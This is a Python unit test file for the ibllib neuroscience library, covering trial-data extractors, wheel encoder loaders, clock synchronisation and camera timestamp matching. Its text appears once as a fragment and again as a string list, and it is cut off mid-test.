2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60] ) np.testing.assert_array_equal(matches, expected) # Check input validation with self.assertRaises(ValueError): camera.attribute_times(tsa, tsb, injective=False, take='closest') if __name__ == "__main__": unittest.main(exit=False, verbosity=2)
[ "import functools\nimport shutil\nimport tempfile\nimport unittest\nimport unittest.mock\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\n\nimport one.alf.io as alfio\nfrom ibllib.io.extractors import training_trials, biased_trials, camera\nfrom ibllib.io import raw_data_loaders as raw\nfrom ibllib.io.extractors.base import BaseExtractor\n\n\ndef wheelMoves_fixture(func):\n \"\"\"Decorator to save some dummy wheelMoves ALF files for extraction tests\"\"\"\n @functools.wraps(func)\n def wrapper(obj=None):\n # Save some wheelMoves ALF files\n attr_list = ['training_lt5',\n 'training_ge5',\n 'biased_lt5',\n 'biased_ge5']\n alf_paths = [getattr(obj, p)['path'] / 'alf' for p in attr_list]\n n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]\n for p, n in zip(alf_paths, n_trials):\n p.mkdir()\n np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))\n np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))\n\n # Run method\n func(obj)\n\n # Teardown; delete the files\n for p in alf_paths:\n shutil.rmtree(p)\n return wrapper\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' / 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' / 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' / 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' / 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5['path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path']))\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5['path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path']))\n # turn off logging for unit testing as we will purposedly go into warning/error cases\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n # Save some dummy wheel moves data for trial firstMovement_times extraction\n\n def test_get_feedbackType(self):\n # TRAINING SESSIONS\n ft = training_trials.FeedbackType(\n self.training_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n # check if no 0's in feedbackTypes\n self.assertFalse(ft[ft == 0].size > 0)\n # -- version >= 5.0.0\n ft = training_trials.FeedbackType(\n self.training_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n # check if no 0's in feedbackTypes\n self.assertFalse(ft[ft == 0].size > 0)\n\n # BIASED SESSIONS\n ft = biased_trials.FeedbackType(\n self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n # check if no 0's in feedbackTypes\n self.assertFalse(ft[ft == 0].size > 0)\n # -- version >= 5.0.0\n ft = biased_trials.FeedbackType(\n self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n # check if no 0's in feedbackTypes\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n # TRAINING SESSIONS\n cl, cr = training_trials.ContrastLR(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n # -- version >= 5.0.0\n cl, cr = training_trials.ContrastLR(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n # BIASED SESSIONS\n cl, cr = biased_trials.ContrastLR(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n # -- version >= 5.0.0\n cl, cr = biased_trials.ContrastLR(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n # TRAINING SESSIONS\n pl = training_trials.ProbabilityLeft(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n # -- version >= 5.0.0\n pl = training_trials.ProbabilityLeft(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n\n # BIASED SESSIONS\n pl = biased_trials.ProbabilityLeft(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n # Test if only probs that are in prob set\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([x in probs for x in pl]) == len(pl))\n # -- version >= 5.0.0\n pl = biased_trials.ProbabilityLeft(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n # Test if only probs that are in prob set\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([x in probs for x in pl]) == len(pl))\n\n def test_get_choice(self):\n # TRAINING SESSIONS\n choice = training_trials.Choice(\n session_path=self.training_lt5['path']).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array(\n [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])\n for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n # -- version >= 5.0.0\n choice = training_trials.Choice(\n session_path=self.training_ge5['path']).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array(\n [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])\n for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n # BIASED SESSIONS\n choice = biased_trials.Choice(\n session_path=self.biased_lt5['path']).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array(\n [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])\n for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n # -- version >= 5.0.0\n choice = biased_trials.Choice(\n session_path=self.biased_ge5['path']).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array(\n [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])\n for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n # TODO: Test its sawtooth\n # TRAINING SESSIONS\n rn = training_trials.RepNum(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n # -- version >= 5.0.0\n rn = training_trials.RepNum(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n # BIASED SESSIONS have no repeted trials\n\n def test_get_rewardVolume(self):\n # TRAINING SESSIONS\n rv = training_trials.RewardVolume(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n # -- version >= 5.0.0\n rv = training_trials.RewardVolume(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n\n # BIASED SESSIONS\n rv = biased_trials.RewardVolume(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n # Test if all non zero rewards are of the same value\n self.assertTrue(all([x == max(rv) for x in rv if x != 0]))\n # -- version >= 5.0.0\n rv = biased_trials.RewardVolume(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n # Test if all non zero rewards are of the same value\n self.assertTrue(all([x == max(rv) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n # TRAINING SESSIONS\n ft = training_trials.FeedbackTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n # BIASED SESSIONS\n ft = biased_trials.FeedbackTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n # TRAINING SESSIONS\n ft = training_trials.FeedbackTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n # BIASED SESSIONS\n ft = biased_trials.FeedbackTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n # TRAINING SESSIONS\n sott = training_trials.StimOnTriggerTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n # -- version >= 5.0.0\n sott = training_trials.StimOnTriggerTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n # BIASED SESSIONS\n sott = biased_trials.StimOnTriggerTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n # -- version >= 5.0.0\n sott = biased_trials.StimOnTriggerTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n # TRAINING SESSIONS\n st = training_trials.StimOnTimes_deprecated(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n # BIASED SESSIONS\n st = biased_trials.StimOnTimes_deprecated(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n # TRAINING SESSIONS\n st = training_trials.StimOnTimes_deprecated(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n # BIASED SESSIONS\n st = biased_trials.StimOnTimes_deprecated(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n # TRAINING SESSIONS\n st = training_trials.StimOnOffFreezeTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n # BIASED SESSIONS\n st = biased_trials.StimOnOffFreezeTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n # TRAINING SESSIONS\n st = training_trials.StimOnOffFreezeTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n # BIASED SESSIONS\n st = biased_trials.StimOnOffFreezeTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n # TRAINING SESSIONS\n di = training_trials.Intervals(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n # -- version >= 5.0.0\n di = training_trials.Intervals(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n # BIASED SESSIONS\n di = biased_trials.Intervals(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n # -- version >= 5.0.0\n di = biased_trials.Intervals(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n # TRAINING SESSIONS\n rt = training_trials.ResponseTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n # -- version >= 5.0.0\n rt = training_trials.ResponseTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n # BIASED SESSIONS\n rt = biased_trials.ResponseTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n # -- version >= 5.0.0\n rt = biased_trials.ResponseTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n # TRAINING SESSIONS\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps']\n ['closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n # -- version >= 5.0.0\n gct = training_trials.GoCueTriggerTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n # BIASED SESSIONS\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps']\n ['closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n # -- version >= 5.0.0\n gct = biased_trials.GoCueTriggerTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n # TRAINING SESSIONS\n gcot = training_trials.GoCueTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n # -- version >= 5.0.0\n gcot = training_trials.GoCueTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n\n # BIASED SESSIONS\n gcot = biased_trials.GoCueTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n # -- version >= 5.0.0\n gcot = biased_trials.GoCueTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n # TRAINING SESSIONS\n it = training_trials.IncludedTrials(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n # BIASED SESSIONS\n it = biased_trials.IncludedTrials(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n # TRAINING SESSIONS\n it = training_trials.IncludedTrials(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n # BIASED SESSIONS\n it = biased_trials.IncludedTrials(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n # TRAINING SESSIONS\n it = training_trials.IncludedTrials(\n self.training_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n # -- version >= 5.0.0\n it = training_trials.IncludedTrials(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n # BIASED SESSIONS\n it = biased_trials.IncludedTrials(\n self.biased_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n # -- version >= 5.0.0\n it = biased_trials.IncludedTrials(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n # TRAINING SESSIONS\n # Expect an error raised because no wheel moves were present in test data\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(\n self.training_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty', str(ex.exception))\n # -- version >= 5.0.0\n out, files = training_trials.extract_all(self.training_ge5['path'], save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n # BIASED SESSIONS\n # The new trials extractor additionally extracts the wheel data and this fails for the < 5.0\n # test data so we will stub the wheel extractor\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel') as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = ({}, [])\n out, files = biased_trials.extract_all(\n self.biased_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n # -- version >= 5.0.0\n out, files = biased_trials.extract_all(self.biased_ge5['path'], save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n # TRAINING SESSIONS\n # only for training?\n path = self.training_lt5['path'] / \"raw_behavior_data\"\n path = next(path.glob(\"_iblrig_encoderPositions.raw*.ssv\"), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206, 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n # here we test for 2 kinds of file corruption that happen\n # 1/2 the first sample time is corrupt and absurdly high and should be discarded\n # 2/2 2 samples are swapped and need to be swapped backk\n path = self.biased_lt5['path'] / \"raw_behavior_data\"\n path = next(path.glob(\"_iblrig_encoderPositions.raw*.ssv\"), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n # -- version >= 5.0.0\n path = self.biased_ge5['path'] / \"raw_behavior_data\"\n path = next(path.glob(\"_iblrig_encoderPositions.raw*.ssv\"), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n # the wheel folder contains other errors in bpod output that had to be addressed\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n # check the output dimensions\n # VERSION >= 5.0.0\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf', object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n # VERSION < 5.0.0\n # for these test data there are no wheel moves so let's mock the output\n mock_data = {\n 'intervals': np.array([[0, 1], ]),\n 'peakAmplitude': np.array([1, 1]),\n 'peakVelocity_times': np.array([1, 1])}\n function_name = 'ibllib.io.extractors.training_wheel.extract_wheel_moves'\n # Training\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf', object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n # Biased\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-6, -20]) # bpod starts 20 secs before with 10 ppm drift\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + .001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) -> None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = (\n \"some_file.csv\",\n \"some_file.tsv\",\n \"some_file.ssv\",\n \"some_file.npy\",\n )\n var_names = (\n \"csv\",\n \"ssv\",\n \"tsv\",\n \"npy\",\n )\n\n def _extract(self, **kwargs) -> tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n\n return (csv, ssv, tsv, npy)\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n def setUp(self) -> None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n # self.addClassCleanup(tempdir.cleanup) # py3.8\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n def test_groom_pin_state(self):\n # UNIT DATA\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n # Add drift\n ts += np.full_like(ts, 1e-4).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.\n audio = {'times': np.empty(n_pulses * 2),\n 'polarities': gpio['polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = (pulse_width * p) + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, 'Audio dict shouldn\\'t be effected')\n np.testing.assert_array_almost_equal(ts_[:4], [40., 40.016667, 40.033333, 40.05])\n\n # Broken TTLs + extra TTL\n delay = 0.08\n pulse_width = 1e-5\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t + pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff=5e-3)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n\n # One front shifted by a large amount\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, tolerance=.1, min_diff=5e-3)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41., 41.3])))\n\n def test_attribute_times(self, display=False):\n # Create two timestamp arrays at two different frequencies\n tsa = np.linspace(0, 60, 60 * 4)[:60] # 240bpm\n tsb = np.linspace(0, 60, 60 * 3)[:45] # 180bpm\n tsa = np.sort(np.append(tsa, .4)) # Add ambiguous front\n tsb = np.sort(np.append(tsb, .41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n\n # Check with default args\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array(\n [0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21,\n 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44,\n 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]\n )\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n\n # Taking closest instead of first should change index of ambiguous front\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n\n # Taking first after should exclude many pulses\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20,\n 22, 23, 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n\n # Lower tolerance\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 